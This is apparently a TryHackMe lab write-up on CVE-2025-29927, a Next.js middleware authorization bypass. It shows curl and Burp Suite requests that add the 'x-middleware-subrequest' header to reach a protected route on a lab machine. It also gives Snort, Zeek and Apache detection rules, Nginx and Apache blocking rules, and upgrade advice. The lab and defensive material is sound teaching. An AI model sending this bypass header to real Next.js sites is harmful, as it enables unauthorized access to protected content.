Next.js CVE-2025–29927: Tryhackme Writeup
A Critical Middleware Authorization Bypass Vulnerability
Who am I?
I’m Chetan Chinchulkar (aka omnipresent), a cybersecurity enthusiast, software developer, and security researcher ranked in the top 2% on TryHackMe. Passionate about ethical hacking, CTFs, and software security, I spend my time breaking and fixing systems. Follow my insights on cybersecurity, bug bounty hunting, and secure software development. Connect with me on Twitter
Introduction
Web application security remains a constant battle between developers and attackers, with new vulnerabilities emerging regularly. One such critical security flaw, CVE-2025–29927, was recently discovered in Next.js, a popular web framework built on top of React.
This vulnerability, identified by Rachid and Yasser Allam, allows attackers to bypass middleware-based authorization in Next.js applications. Since middleware controls incoming requests before they reach the routing system, bypassing it effectively removes authentication and access restrictions.
The impact of this flaw is significant: e-commerce platforms, news websites, SaaS applications, and internal tools built with Next.js are all at risk. As a result, administrators and developers must act swiftly to mitigate this vulnerability to prevent unauthorized access to protected routes.
In this article, we will explore:
• The discovery of CVE-2025–29927
• How attackers can exploit this vulnerability
• Detection techniques to identify attacks
• Mitigation steps to secure Next.js applications
Understanding the Vulnerability
How CVE-2025–29927 Works
Next.js uses middleware to handle authentication, authorization, and request modification before forwarding them to the main application routes. However, in affected versions, it is possible to bypass this middleware protection by adding a specific HTTP header: ‘x-middleware-subrequest: middleware’
When this header is included in an HTTP request, the request skips middleware processing, allowing an attacker to directly access protected routes that require authentication.
Affected Versions
Any Next.js version before 14.2.25 and 15.2.3 is vulnerable. Developers using older versions must upgrade immediately to a patched version.
Exploitation: Bypassing Middleware Authentication
1. Bypassing Authentication Using Curl
curl http://10.10.232.184:3000/protected -I
curl -H "x-middleware-subrequest: middleware" http://10.10.232.184:3000/protected -I Successfully
Now to view full content of the /protected route using curl
curl -H "x-middleware-subrequest: middleware" http://10.10.232.184:3000/protected As there’s a lot of code we’ll use grep to filter for flag
curl -H "x-middleware-subrequest: middleware" http://10.10.232.184:3000/protected | grep THM{
Flag: THM{Redacted}
2. Exploiting via Burp Suite
If an attacker prefers a graphical tool, Burp Suite can be used to modify the HTTP request headers:
1. Open Burp Suite and navigate to the Proxy tab.
2. Click Open Browser and visit http://10.10.232.184:3000/protected.
3. Modify the intercepted request by adding: `x-middleware-subrequest: middleware`
Instead of redirect we’re able to view the page
Detection: Identifying Attacks
Since this attack relies on a specific HTTP header, detection strategies should focus on monitoring request logs and network traffic.
1. Manual Log Analysis
If the web server logs incoming headers, administrators can look for suspicious requests containing x-middleware-subrequest.
For example, in Apache, logs can be configured to capture this header using:
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{x-middleware-subrequest}i\"" custom2. Using Snort IDS for Detection
Snort, an intrusion detection system (IDS), can detect exploitation attempts with the following rule:
alert tcp any any -> any any (msg: "HTTP 'x-middleware-request' header detected, possible CVE-2025-29927 exploitation"; content:"x-middleware-subrequest"; rawbytes; sid:10000001; rev:1)This rule scans network packets for the malicious HTTP header and generates alerts when detected.
3. Using Zeek for Advanced Network Monitoring
Zeek, a network security monitoring tool, can also detect this vulnerability using the following rule:
module CVE_2025_29927;
export {
event http_header(c: connection, is_orig: bool, name: string, value: string) {
if (name == "x-middleware-subrequest" && value == "middleware") {
Log::write(HTTP::LOG, [
$note="CVE_2025_29927_Exploit",
$msg="Detected HTTP header associated with CVE-2025-29927",
$header=name,
$value=value
]);
}
}
}Administrators can load this script into Zeek and restart it to begin logging and detecting potential attacks.
Mitigation: Securing Your Next.js Application
1. Upgrade to a Patched Version
The best and most effective mitigation is to upgrade to a secure version of Next.js.
• Next.js 15.x → Upgrade to 15.2.3
• Next.js 14.x → Upgrade to 14.2.25
• Next.js 13.x → Upgrade to 13.5.9
• Next.js 12.x → Upgrade to 12.3.5
2. Block Malicious Requests at the Web Server Level
If upgrading is not immediately possible, a temporary workaround is to configure your web server to block requests containing the x-middleware-subrequest header.
For Nginx, add the following directive:
if ($http_x_middleware_subrequest) {
return 403;
}For Apache, use:
RewriteEngine On
RewriteCond %{HTTP:x-middleware-subrequest} ^(.*)$ [NC]
RewriteRule .* - [F]This will forbid requests that attempt to bypass middleware using the exploit.
3. Implement Custom Middleware Checks
Developers should reinforce authorization at the route level instead of relying solely on middleware. This ensures that even if middleware is bypassed, unauthorized users cannot access protected content.
We’ve completed the room
Conclusion
CVE-2025–29927 is a severe security vulnerability in Next.js that allows attackers to bypass authentication using a simple HTTP header manipulation. Given the widespread use of Next.js in production applications, this flaw poses a major security risk.
To protect your applications, developers and administrators should:
✅ Upgrade to a patched Next.js version (14.2.25 or 15.2.3).
✅ Monitor logs for suspicious requests.
✅ Deploy IDS/IPS solutions like Snort or Zeek.
✅ Block malicious headers at the web server level.
✅ Implement additional security measures beyond middleware authentication.
By taking these proactive steps, organizations can secure their applications and prevent unauthorized access.
References
• Next.js Official Security Advisory
• TryHackMe — Next.js CVE-2025–29927 Room
🔒 Stay secure, and always keep your dependencies up to date! 🚀
